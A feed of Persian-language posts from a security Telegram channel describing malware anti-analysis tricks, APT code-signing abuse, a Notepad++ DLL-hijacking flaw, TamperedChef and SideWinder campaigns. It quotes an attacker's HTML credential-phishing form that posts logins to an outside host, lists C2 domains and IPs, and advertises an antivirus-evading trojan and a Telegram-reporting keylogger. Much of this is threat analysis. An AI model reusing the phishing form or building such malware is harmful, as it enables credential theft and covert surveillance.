🟥 خودکشی فرآیند (Process Self-Termination) یعنی چه؟

مکانیزم پیشرفته ضدتحلیل

خودکشی پردازشی یا Self-Termination یکی از تاکتیک‌های کلیدی در بدافزارهای مدرن مانند Lumma Stealer است. این تکنیک یک اقدام دفاعی نهایی است که بدافزار برای جلوگیری از تحلیل خود در محیط‌های کنترل‌شده، مانند Sandboxها و ماشین‌های مجازی (VMs) به کار می‌گیرد.

بر خلاف پایان دادن عادی به یک فرآیند (ExitProcess) ، خودکشی پردازشی در بدافزارها با یک مکانیزم تصمیم‌گیری پیشرفته گره خورده است که بر مبنای یافته‌های (Anti-Analysis) عمل می‌کند.

۱. معماری تصمیم‌گیری (Decision Architecture)

خودکشی پردازشی هرگز به صورت تصادفی رخ نمی‌دهد، بلکه نتیجه شکست بدافزار در عبور از تست‌های محیطی است. این فرآیند از الگوریتم‌های شرطی تو در تو (Nested Conditional Logic) استفاده می‌کند:

بررسی فرآیندها/فایل‌های VM (مانند vmtoolsd.exe , VBoxGuestAdditions.sys)

بررسی نام‌های سیستمی (مانند COMPUTERNAME یا USERNAME پیش‌فرض Sandboxها)

بررسی زمان‌بندی و وقفه (Timing and Delay) اجرای سریع و نرم دستورات

بررسی (Debugger Presence) عدم یافتن پرچم BeingDebugged

تست ارتباط شبکه (Fabricated Domain Ping) عدم پاسخگویی به دامنه‌ی ساختگی

۲. مکانیزم‌های فنی خودکشی (Technical Self-Termination Methods)

پس از اینکه بدافزار از طریق تست‌های بالا به قطعیت رسید که در حال تحلیل است، از یکی از روش‌های زیر برای پایان دادن به فرآیند خود استفاده می‌کند:

الف) فراخوانی مستقیم API (Direct API Call)

ساده‌ترین و رایج‌ترین روش، فراخوانی توابع Native API برای خاتمه دادن به فرآیند جاری است:

۔* ExitProcess: این تابع سطح بالا در kernel32.dll است و رایج‌ترین روش خاتمه دادن به فرآیند است.

۔* NtTerminateProcess: این تابع Native API در ntdll.dll است و یک فراخوانی سطح پایین‌تر به هسته است. در بدافزارهای مدرن، اغلب از این تابع استفاده می‌شود تا احتمال Hooking توسط EDRها کمتر شود.

NtTerminateProcess( (HANDLE)-1, 0 );

👆 -1 نشان‌دهنده فرآیند جاری است

ب) تولید استثنای کشنده (Generating Fatal Exception)

یک روش پیشرفته‌تر و پنهان‌تر، مجبور کردن سیستم‌عامل به خاتمه دادن به فرآیند از طریق تولید یک خطای غیرقابل بازیابی (Fatal Exception) است. این کار می‌تواند تحلیلگر را گمراه کند:

* فراخوانی RaiseException با کد خطا: بدافزار می‌تواند عمداً یک استثناء با کدهای خطای خاص (مثلاً STATUS_ILLEGAL_INSTRUCTION) ایجاد کند. اگر بدافزار در یک محیط Sandbox بدون مدیریت استثناء فعال باشد، سیستم‌عامل به سادگی فرآیند را خاتمه می‌دهد.

* دستورات Assembly غیرقانونی (Illegal Instructions): اجرای مستقیم دستورات اسمبلی نامعتبر (مانند INT 3 برای دیباگرها یا دستوراتی که پردازنده فعلی پشتیبانی نمی‌کند) می‌تواند منجر به خطای سخت‌افزاری و خاتمه فرآیند شود.

ج) Self-Overwrite و پاکسازی حافظه (Self-Overwrite and Memory Cleansing)

پیشرفته‌ترین بدافزارها قبل از خودکشی، بخشی از حافظه حیاتی خود را Overwrite کرده یا Unmap می‌کنند.

* هدف: جلوگیری از استخراج Payload نهایی یا کلیدهای رمزگشایی در لحظه مرگ فرآیند.

* روش: استفاده از توابعی مانند VirtualFree برای آزاد کردن نواحی تخصیص یافته حافظه (به خصوص نواحی حاوی Payload مرحله بعد) یا بازنویسی بخش‌های کد با داده‌های تصادفی/صفر (Zero-out) قبل از فراخوانی ExitProcess .

۳. خودکشی هوشمند (Smart Self-Termination) در بدافزارهای امروزی

در بدافزارهای APT، خودکشی پردازشی صرفاً یک پایان ساده نیست، بلکه بخشی از یک استراتژی دفاعی است:

1۔ Delay and Exit: بدافزار ممکن است تشخیص دهد که در حال تحلیل است، اما به جای خاتمه فوری، برای مدت کوتاهی به اجرای عملیات‌های بی‌ضرر ادامه می‌دهد (مثلاً خوابیدن برای یک مدت طولانی با SleepEx یا حلقه‌های طولانی) و سپس به طور ناگهانی خاتمه می‌یابد. این کار باعث می‌شود ابزارهای تحلیل خودکار، قبل از رسیدن به نقطه خودکشی، به دلیل محدودیت زمان اجرا، تحلیل را متوقف کنند و گزارش دهند که بدافزار "فعالیتی نداشته است".

2۔ Clean Exit vs. Crash Exit: بدافزارهای پیچیده تمایل دارند از Clean Exit (خاتمه تمیز با API مانند ExitProcess) استفاده کنند تا فرآیند به طور ناگهانی "Crash" نشود و گزارش خطا یا Dumps حافظه ایجاد نشود که بتواند توسط تحلیلگر بررسی شود.

⬅️ هدف نهایی تحلیلگر بدافزار، نه فقط دور زدن تکنیک، بلکه فهمیدن منطق آن است. ➡️

🔥 دستورالعمل‌های غیرمجاز , بدافزارها و تحلیلگران

🔤🔤🔤 @NullError_ir

✅#SSL

هکرهای APT ایران از گواهینامه‌های SSL.com برای امضای بدافزار استفاده می‌کنند

گروه‌های سایبری ایران (Charming Kitten , Subtle Snail , UNC1549 و زیر شاخه های آنها )از تکنیکی استفاده می‌کنند که در آن با جعل یا سوءاستفاده از گواهی‌های دیجیتال معتبر SSL/TLS ، بدافزارها و ابزارهای خود را امضا (Sign) می‌کنند.

### نکات کلیدی فنی و امنیتی

* هدف اصلی: هدف از امضای بدافزار با گواهی معتبر، فریب دادن سیستم‌عامل‌ها (به خصوص ویندوز) و ابزارهای امنیتی (مانند EDRها و آنتی‌ویروس‌ها) است که اغلب برنامه‌های امضا شده را قابل اعتمادتر و کمتر مخرب تلقی می‌کنند. این امر به بدافزار اجازه می‌دهد تا راحت‌تر از فیلترهای امنیتی عبور کرده و در شبکه قربانی پایداری (Persistence) ایجاد کند.

* روش‌های دستیابی به گواهی‌ها:

* سرقت گواهی: نفوذ به زیرساخت‌های مراکز صدور گواهی (CA - Certificate Authority) مانند حادثه مشهور Comodo و DigiNotar در سال‌های گذشته، که در آن هکرها توانستند گواهی‌های جعلی برای دامنه‌های مهم جهانی (مثل گوگل، یاهو) صادر کنند.

* خرید گواهی‌های مسروقه: خرید گواهی‌های معتبر مسروقه از بازارهای زیرزمینی دارک‌نت.

* استفاده از گواهی‌های منقضی/لغو شده: حتی برخی از گواهی‌های لغو شده یا منقضی شده نیز ممکن است توسط ابزارهای امنیتی قدیمی نادیده گرفته شوند.

* تأثیر بر شناسایی: امضای معتبر باعث می‌شود بدافزار از لحاظ ظاهری شبیه یک نرم‌افزار قانونی و قانونی به نظر برسد، که این موضوع کار مهندسی معکوس و تحلیل بدافزار را برای تحلیلگران امنیتی سخت‌تر می‌کند و شناسایی آن توسط سامانه‌های مبتنی بر امضا را مختل می‌سازد.

* ارتباط با APTها: این تکنیک به طور مکرر توسط گروه‌های APT ایرانی مشاهده شده است که نشان‌دهنده پیچیدگی و سطح بالای دانش فنی این بازیگران در دور زدن مکانیزم‌های امنیتی پایه است.

@NullError_ir

✅Notepad++

آسیب‌پذیری DLL Hijacking در ++Notepad

یک آسیب‌پذیری جدید DLL Hijacking (تزریق کتابخانه پیوند پویا) که به تازگی در ++Notepad ، ویرایشگر محبوب کد منبع، کشف شده است، می‌تواند به مهاجمان اجازه دهد تا کد دلخواه را بر روی دیوایس قربانی اجرا کنند.

این نقص که با شناسه CVE-2025-56383 ثبت شده است، در نسخه 8.8.3 وجود دارد و به طور بالقوه تمامی نسخه‌های نصب شده این نرم‌افزار را تحت تأثیر قرار می‌دهد، که میلیون‌ها کاربر را در معرض خطر قرار می‌دهد. این آسیب‌پذیری به یک مهاجم محلی (Local Attacker) این امکان را می‌دهد که با قرار دادن یک فایل DLL مخرب در مسیری که برنامه برای بارگذاری کتابخانه‌های مورد نیاز خود جستجو می‌کند، به اجرای کد دست یابد. این نوع حمله، اصالت (Integrity) برنامه را تضعیف می‌کند و می‌تواند برای تثبیت دسترسی (Establish Persistence) یا افزایش سطح دسترسی (Escalate Privileges) در یک سیستم آلوده به کار رود.

## انتشار اکسپلویت (PoC Exploit) و جزئیات فنی

۔ DLL Hijacking از نحوه جستجو و بارگذاری کتابخانه‌های مورد نیاز توسط برنامه‌های ویندوز بهره‌برداری می‌کند. اگر یک برنامه بدون تعیین مسیر کامل (Full Path) برای یک DLL جستجو کند، ممکن است در چندین دایرکتوری، بر اساس یک ترتیب از پیش تعریف شده ، به دنبال آن بگردد.

یک مهاجم می‌تواند یک DLL مخرب با همان نام کتابخانه قانونی را در دایرکتوری‌ای قرار دهد که قبل از مکان واقعی کتابخانه توسط سیستم جستجو می‌شود. هنگامی که کاربر برنامه را راه‌اندازی می‌کند، DLL مخرب به جای کتابخانه اصلی بارگذاری و اجرا می‌شود.

در مورد ++Notepad ، این آسیب‌پذیری می‌تواند با هدف قرار دادن DLLهای مرتبط با پلاگین‌های (Plugins) آن بهره‌برداری شود. بر اساس اثبات مفهوم (PoC) منتشر شده، مهاجم می‌تواند فایل یک پلاگین، مانند NppExport.dll که در مسیر ++Notepad\plugins\NppExport\ قرار دارد، را با یک DLL مخرب ساخته‌شده سفارشی (Custom-Crafted Malicious DLL) جایگزین کند.

### تکنیک Proxying برای پنهان‌کاری

برای پنهان ماندن از دید کاربر و اطمینان از اینکه عملکرد برنامه به صورت عادی ادامه پیدا کند، مهاجم می‌تواند DLL اصلی را تغییر نام دهد (مثلاً به original-NppExport.dll ) و سپس کاری کند که جایگزین مخرب، تمام فراخوانی‌های تابع قانونی (Legitimate Function Calls) را به سمت DLL اصلی تغییر نام داده شده، ارجاع (Forward) دهد.

این تکنیک که به عنوان Proxying یا واسطه‌گری شناخته می‌شود، باعث می‌شود رفتار برنامه برای کاربر بدون مشکل (Seamless) به نظر برسد، در حالی که بار داده‌ای مخرب (Malicious Payload) در پس‌زمینه در حال اجرا است.

اندازه فایل NppExport.dll مخرب به طور قابل توجهی کوچکتر از original-NppExport.dll است که نشان‌دهنده وجود کد متفاوت در آن است.

### اجرای فایل مخرب

پس از راه‌اندازی Notepad++.exe ، برنامه، DLL مخرب را بارگذاری می‌کند که منجر به اجرای کد مهاجم می‌شود.

## تثبیت دسترسی و راهکارهای مقابله

تهدید اصلی ناشی از این آسیب‌پذیری، اجرای کد محلی است. مهاجمی که پیش‌تر از طریق بدافزار، فیشینگ یا سایر روش‌ها، دسترسی اولیه به سیستم را به دست آورده باشد، می‌تواند از این نقص برای تثبیت دسترسی استفاده کند.

با Hijack کردن یک DLL در برنامه‌ای پرکاربرد مانند ++Notepad ، کد مهاجم هر بار که کاربر ویرایشگر را باز می‌کند اجرا خواهد شد و این امر بقا و ماندگاری بدافزار را پس از راه‌اندازی مجدد سیستم تضمین می‌کند.

اگرچه این در تست بر روی Notepad++ v8.8.3 نصب شده از طریق نصاب رسمی انجام شده است، اما مشکل زمینه‌ای، اساساً به نحوه بارگذاری مؤلفه‌های برنامه مرتبط است، که نشان می‌دهد هر نسخه نصب شده‌ای می‌تواند آسیب‌پذیر باشد.

### در حال حاضر در این لحظه، هیچ پچ رسمی از سوی توسعه‌دهندگان ++Notepad برای رفع CVE-2025-56383 منتشر نشده است.

@NullError_ir

✅#SatelliteModems

تحقیقات جامع در مورد مودم‌های ماهواره‌ای تجاری موجود در بازار نشان دهنده آسیب‌پذیری‌های امنیتی زیادی در این تجهیزات است.

نکته : رمزگذاری در بسیاری از مودم‌های ماهواره‌ای تجاری به طور پیش‌فرض غیرفعال است - و گاهی اوقات فعال کردن آن هزینه اضافی دارد. در نتیجه، بسیاری از کاربران هرگز رمزگذاری را فعال نمی‌کنند .

تحلیل جامع آسیب‌پذیری‌ها و حملات امنیتی در مودم‌های ماهواره‌ای (به زبان انگلیسی)👇

@NullError_ir

✅#Cracks

✈️ این رو هم ببینید جالبه

▶️ شکستن قفل گاوصندوق

✅ نکته : وقتی شرکت‌های امنیتی بر روی محصولاتشان راهی برای

Reset/Forget/Recovery Password

می‌گذارند و هکرها از آن به عنوان

Backdoor
استفاده می‌کنند .

✈️ @NullError_ir

  

✅#TamperedChef

بدافزار TamperedChef

کمپین جدید بدافزار TamperedChef یک نمونه بارز از رویکرد مهاجمان برای ادغام تکنیک‌های مهندسی نرم‌افزار مدرن با مکانیزم‌های گریز پیشرفته است. این بدافزار با استفاده از برنامه‌های کاربردی تروجان‌شده (Trojanized Productivity Tools) مانند Calendaromatic.exe و ImageLooker.exe ، به طور هدفمند دفاع‌های امنیتی سنتی را دور می‌زند.

۱. دسترسی اولیه

طعمه طعمه‌های این کمپین ابزارهای بهره‌وری به‌ظاهر بی‌ضرر مانند تقویم و نمایشگر تصویر هستند.

توزیع فایل‌های مخرب از طریق آرشیوهای 7-Zip توزیع می‌شوند.

سوءاستفاده از نقص امنیتی نکته فنی کلیدی در این مرحله، بهره‌برداری از آسیب‌پذیری CVE-2025-0411 در مکانیزم Mark of the Web (MotW) ویندوز است.

* مکانیزم MotW: این مکانیزم برای علامت‌گذاری فایل‌هایی است که از اینترنت دانلود شده‌اند و به ویندوز هشدار می‌دهد که باید کنترل‌های امنیتی سخت‌گیرانه‌تری (مانند SmartScreen ) را اعمال کند.

* حمله: با سوءاستفاده از نقص در نحوه مدیریت فایل‌های 7-Zip، بدافزار می‌تواند بدون فعال کردن هشدارهای امنیتی مبتنی بر اعتبار (Reputation-Based Security Controls)، اجرا شود و این کار، مرحله Initial Access را برای مهاجم به شدت تسهیل می‌کند.

۲. پیچیدگی فنی: استفاده از NeutralinoJS و مهندسی بدافزار

چارچوب ساخت بدافزار هر دو فایل Calendaromatic.exe و ImageLooker.exe با استفاده از NeutralinoJS ساخته شده‌اند.

*۔ NeutralinoJS یک چارچوب دسکتاپ سبک‌وزن که به توسعه‌دهندگان اجازه می‌دهد تا برنامه‌های دسکتاپ بومی (Native Desktop Applications) را با استفاده از HTML، CSS و JavaScript بسازند.

* مزیت برای مهاجم این انتخاب به بدافزار اجازه می‌دهد تا ضمن حفظ ظاهر کاملاً قانونی یک نرم‌افزار دسکتاپ، از قدرت و انعطاف‌پذیری جاوا اسکریپت برای اجرای بارهای مخرب و تعامل مستقیم با APIهای سیستم‌عامل استفاده کند. این یک تکنیک Defense Evasion عالی است، زیرا بسیاری از راهکارهای امنیتی، رفتار چارچوب‌های توسعه مشروع را به‌دقت مانیتور نمی‌کنند.

* امضای دیجیتال استفاده از امضاهای دیجیتال معتبر (اگرچه از نهادهای مشکوک مانند CROWN SKY LLC و LIMITED LIABILITY COMPANY APPSOLUTE) به منظور فریب کاربر و همچنین دور زدن فیلترهای امنیتی مبتنی بر اعتبار و شهرت است.

۳. مکانیزم گریز پیشرفته از طریق یونیکد

یکی از پیشرفته‌ترین تکنیک‌های گریز در این بدافزار، استفاده از هموگلیف‌های یونیکد (Unicode Homoglyphs) است:

* عملکرد: بدافزار بارهای مخرب (Malicious Payloads) خود را در پاسخ‌های API که به‌ظاهر بی‌خطر هستند، با استفاده از هموگلیف‌های یونیکد رمزگذاری (Encode) می‌کند.

* گریز از تشخیص: این تکنیک به بدافزار اجازه می‌دهد تا از سیستم‌های تشخیص مبتنی بر رشته (String-Based Detection) و الگوریتم‌های تطبیق امضا (Signature Matching) عبور کند. این ابزارها برای شناسایی الگوهای مشخص در ترافیک شبکه یا فایل‌ها طراحی شده‌اند. وقتی داده‌ها با کاراکترهای یونیکد جایگزین می‌شوند (که شبیه کاراکترهای عادی هستند اما کد متفاوتی دارند)، تشخیص سنتی شکست می‌خورد.

* کانال اجرای مخفی: هنگام اجرا، بدافزار این پیلودهای پنهان را رمزگشایی کرده و آن‌ها را از طریق زمان اجرای NeutralinoJS اجرا می‌کند و عملاً یک کانال اجرای مخفی (Covert Execution Channel) ایجاد می‌کند که زیر رادار سیستم‌های نظارتی مرسوم کار می‌کند.

۴. پایداری و استخراج داده

* پایداری بدافزار از طریق ایجاد وظایف زمان‌بندی‌شده (Scheduled Tasks) و تغییرات در رجیستری ویندوز (Registry Modifications) ، پایداری خود را تضمین می‌کند. استفاده از پرچم‌های خط فرمان (Command-line Flags) مانند --install ، --enableupdate و --fullupdate نشان می‌دهد که مهاجم یک معماری مدولار و قابل کنترل برای مدیریت وضعیت بدافزار دارد.

* فرمان و کنترل : پس از نصب موفق، بدافزار به سرعت با سرورهای فرمان و کنترل (مانند calendaromatic[.]com و movementxview[.]com) ارتباط برقرار می‌کند.

* رمزگذاری C2: این ارتباطات از طریق کانال‌های رمزگذاری‌شده (Encrypted Channels) انجام می‌شود، که تلاش تیم‌های آبی (Blue Teams) برای شناسایی محتوای داده‌های ارسالی یا دستورات دریافتی را به شدت پیچیده می‌کند.

* تأثیر مخرب (Impact): تأثیر بدافزار شامل:

* سرقت اعتبارنامه‌ها و Session Tokens: استخراج اطلاعات ذخیره‌شده حساس از مرورگرها.

* ربایش مرورگر (Browser Hijacking): تغییر تنظیمات مرورگر و هدایت ترافیک وب برای تسهیل فعالیت‌های مخرب مستمر.

* دسترسی دائمی Backdoor: فراهم کردن امکان استخراج داده و اجرای دستورات از راه دور.

@NullError_ir

✅#Ai_Extensions

افزونه‌های جعلی هوش مصنوعی در مرورگرها

مهاجمان در حال انتشار افزونه‌های مخرب برای خصوصا مرورگر کروم هستند که خود را به جای ابزارهای معروف هوش مصنوعی مانند ChatGPT، Claude و Perplexity جا می‌زنند.

روش حمله: این افزونه‌ها پس از نصب، به‌طور مخفیانه موتور جستجوی پیش‌فرض مرورگر شما را تغییر می‌دهند. در نتیجه، تمام جستجوهای شما ابتدا از سرورهای مهاجم عبور می‌کند.

خطر اصلی: این کار به مهاجمان اجازه می‌دهد تمام اطلاعاتی که جستجو می‌کنید (شامل داده‌های شخصی، اطلاعات کاری و محرمانه) را سرقت کنند. این یک حمله از نوع Man-in-the-Middle است.

نحوه توزیع: این افزونه‌های مخرب اغلب از طریق تبلیغات فریبنده و ویدیوهای تبلیغاتی در یوتیوب پخش می‌شوند.

از نصب افزونه‌های ناشناس برای دسترسی به سرویس‌های محبوب خودداری کنید. همیشه قبل از نصب، مجوزهای درخواستی افزونه را به‌دقت بررسی کنید، به‌خصوص اگر درخواست تغییر تنظیمات مرورگر را داشته باشد. تنها از منابع رسمی و کاملاً معتبر افزونه نصب کنید.

اطلاعات بیشتر و شناسایی نمونه‌ها

@NullError_ir

✅#Motorola

دوستانی هم که به این موضوعات علاقه دارند

کالبد شکافی رادیو بیسیم موتورولا

@NullError_ir

✅#Trojan

( c++ ) 🔥🔥🔥

یک نمونه تروجان که می‌تواند اکثر نرم‌افزارهای آنتی‌ویروس و سندباکس‌ها را دور بزند .


نحوه استفاده رو نوشته دقت کنید.

@NullError_ir

✅#GOLANG_Reverse_Engineering

مهندسی معکوس فایل‌های گولنگ با IDA

@NullError_ir

✅#obex

ابزاری برای مسدود کردن dll‌های ناخواسته موقع اجرای یه برنامه - ارزشمند برای نفوذگرها و رد‌ تیم‌ها

@NullError_ir

✅#APT_SideWinder

کمپین جدید SideWinder با هدف سرقت اطلاعات

گروه هکری (APT) SideWinder که یک گروه با حمایت دولتی و سابقه طولانی در عملیات‌های جاسوسی سایبری در جنوب آسیا شناخته می‌شود، اخیراً کمپین فیشینگ جدیدی را با استفاده از پورتال‌های جعلی سرویس‌های ایمیل Outlook و Zimbra آغاز کرده است. هدف اصلی این عملیات، سرقت اطلاعات ورود (Credentials) از اهداف حساس دولتی و نظامی است.

جزئیات فنی و تاکتیک‌های عملیاتی

1. زیرساخت حمله:

* مهاجمان برای میزبانی صفحات فیشینگ خود از پلتفرم‌های هاستینگ رایگان و معتبر مانند Netlify و pages.dev و workers.dev استفاده می‌کنند. این رویکرد دو مزیت کلیدی برای آن‌ها دارد:

* فرار از مکانیزم‌های دفاعی: با استفاده از سرویس‌های معتبر، مهاجمان به‌راحتی فیلترهای مبتنی بر reputaion دامنه را دور می‌زنند.

* سرعت عملیاتی بالا : این گروه قادر است به‌سرعت دامنه‌های فیشینگ خود را تغییر دهد. طبق گزارش، هر سه تا پنج روز یک سایت جدید ایجاد می‌شود که این موضوع شناسایی و مسدودسازی آن‌ها را دشوار می‌کند.

2. روش فریب و طعمه‌ها:

* این گروه از اسناد با مضامین دریایی و دفاعی به‌عنوان طعمه برای فریب قربانیان استفاده می‌کند.

* نمونه‌های مشخص:

* در بنگلادش، وب‌سایت اداره کل خریدهای دفاعی (DGDP) جعل شده و پورتال‌هایی با عنوان "Secured File" ایجاد گردیده که از قربانیان می‌خواهد برای دسترسی به جزئیات تجهیزات دفاعی ترکیه، اطلاعات ورود ایمیل خود را وارد کنند.

* در نپال، کارمندان وزارت دارایی ایمیل‌هایی حاوی یک فایل PDF فریبنده با عنوان सम्माननीय प्रधानमन्त्रीज्यूको चीन भ्रमण सम्बन्धमा.pdf (در خصوص سفر نخست‌وزیر محترم به چین) دریافت کرده‌اند که آن‌ها را به یک صفحه لاگین جعلی Outlook در بستر Netlify (با آدرس IP: 98.84.224.111 ) هدایت می‌کند.

3. مکانیزم سرقت اطلاعات:

* برخلاف بسیاری از حملات که متکی بر پی‌لودهای بدافزاری سمت کلاینت هستند، این کمپین مستقیماً از طریق فرم‌های HTML اطلاعات را جمع‌آوری می‌کند.

* یک فرم HTML ساده، اطلاعات وارد شده (نام کاربری و رمز عبور) را از طریق یک درخواست POST به سرور تحت کنترل مهاجم ارسال می‌کند. نمونه‌ای از این کد برای هدف قرار دادن SUPARCO (سازمان تحقیقات فضایی و جوی پاکستان) مشاهده شده است:

        <form method="POST" action="https://technologysupport.help/1pac.php">
          <input type="hidden" name="inbox" value="Y2hhaXJtYW5Ad2FwYXJjby5nb3YucGs=">
          <label for="email">Email:</label>
          <input type="email" id="email" name="user_email" required>
          <label for="pass">Password:</label>
          <input type="password" id="pass" name="user_pass" required>
          <button type="submit">Sign In</button>
        </form>
        

* تحلیل کد:

* یک فیلد مخفی (hidden ) با نام inbox در فرم وجود دارد که مقدار آن یک آدرس ایمیل رمزنگاری‌شده با Base64 است Y2hhaXJtYW5Ad2FwYXJjby5nb3YucGs= که معادل chairman@waparco.gov.pk است. این تکنیک به مهاجمان اجازه می‌دهد تا اطلاعات سرقت‌شده را با کمپین‌های خاص خود مرتبط سازند.

* اطلاعات مستقیماً به آدرس https://technologysupport.help/1pac.php ارسال می‌شود.

4. تکنیک‌های تکمیلی و پنهان‌سازی:

* در برخی موارد، از کدهای JavaScript برای افزایش پیچیدگی حمله استفاده می‌شود. برای مثال، آدرس ایمیل قربانی قبل از ارسال به صفحه فیشینگ ثانویه، با Base64 کدگذاری می‌شود. این کار هم به ردیابی نشست‌ها (Session Tracking) کمک می‌کند و هم تحلیل‌های سطحی و سریع را با چالش مواجه می‌سازد.

* پس از ارسال اطلاعات، ممکن است یک پیغام reload به کاربر نمایش داده شود تا در صورت ورود اطلاعات اشتباه، مجدداً آن‌ها را وارد کند.

اهداف و گستره جغرافیایی

این کمپین به‌طور خاص بر روی سازمان‌های دولتی و نظامی در کشورهای جنوب آسیا متمرکز است، از جمله:

* پاکستان
* نپال
* سریلانکا
* بنگلادش
* میانمار

مراحل پس از بهره‌برداری

اطلاعات سرقت‌شده در فرآیندهای جاسوسی گسترده‌تر این گروه مورد استفاده قرار می‌گیرد. این اطلاعات به SideWinder اجازه می‌دهد تا به شبکه‌های محدودشده دسترسی پیدا کند یا در مراحل بعدی، بدافزارهای خود را از دایرکتوری‌های باز روی سرورهای خود مانند IPهای 47.236.177.123 و 31.14.142.50 مستقر کند.


@NullError_ir

✅#CVE

جدیدترین CVEها به همراه اکسپلویت‌ها

#infosec #pentest #redteam #blueteam

@NullError_ir

🔤➕➕ ❌ 📺

✅#Anti_Screen

یک کد ساده برای جلوگیری از گرفته شدن اسکرین‌شات یا ضبط ویدیو از محتوای پنجره‌ی برنامه که البته کاربردهای دیگه‌ای هم داره :

1. پنهان‌سازی فعالیت بدافزار: یک بدافزار می‌تواند رابط کاربری خود (مثلاً یک پنجره‌ی تنظیمات یا یک فیشینگ پاپ‌آپ) را با این تکنیک محافظت کند. این کار تحلیلگران امنیتی را که از ابزارهای مبتنی بر اسکرین‌شات یا ضبط ویدیو برای مستندسازی و تحلیل رفتار بدافزار در محیط‌های سندباکس استفاده می‌کنند، با چالش مواجه می‌کند.

2. جلوگیری از گزارش‌گیری کاربر: اگر یک بدافزار یک پنجره‌ی جعلی برای دریافت اطلاعات حساس (مانند رمز عبور) نمایش دهد، استفاده از SetWindowDisplayAffinity می‌تواند مانع از این شود که کاربر به راحتی از آن پنجره اسکرین‌شات گرفته و برای تیم پشتیبانی یا امنیتی ارسال کند.

3. دور زدن سیستم‌های مانیتورینگ: برخی از سیستم‌های نظارت بر فعالیت کاربر (Employee Monitoring) یا ابزارهای (Parental Control) برای رصد فعالیت‌ها به صورت دوره‌ای اسکرین‌شات می‌گیرند. یک برنامه مخرب می‌تواند با این روش خود را از دید این سیستم‌ها پنهان کند.

@NullError_ir

✅#Keylogger

یک کیلاگر نوشته شده با Rust

درود به همه دوستان و اساتید . این سورس کد ساده بدافزار کیلاگر که با زبان برنامه‌نویسی Rust قبلا به عنوان نمونه نوشته بودم برای لینوکس هست که لاگ‌ها رو جمع آوری و به تلگرام میفرسته .

نکاتی داره برای آموزش و یادگیری و البته نقاط ضعفش رو هم نوشتم که بدونید و خودتون جهت یادگیری اصلاحش کنید . مثل :

مشخص بودن مقادیر ربات تلگرام (توکن و آی‌دی) در سورس کد.

ثبت شدن پیغام‌های خطا (eprintln!) در کد.

ثابت بودن مسیر دایرکتوری (/tmp/k-pro-logs) که به راحتی توسط ابزارهای مانیتورینگ فایل قابل شناسایی است.

🔠🔠🔠🔠

@NullError_ir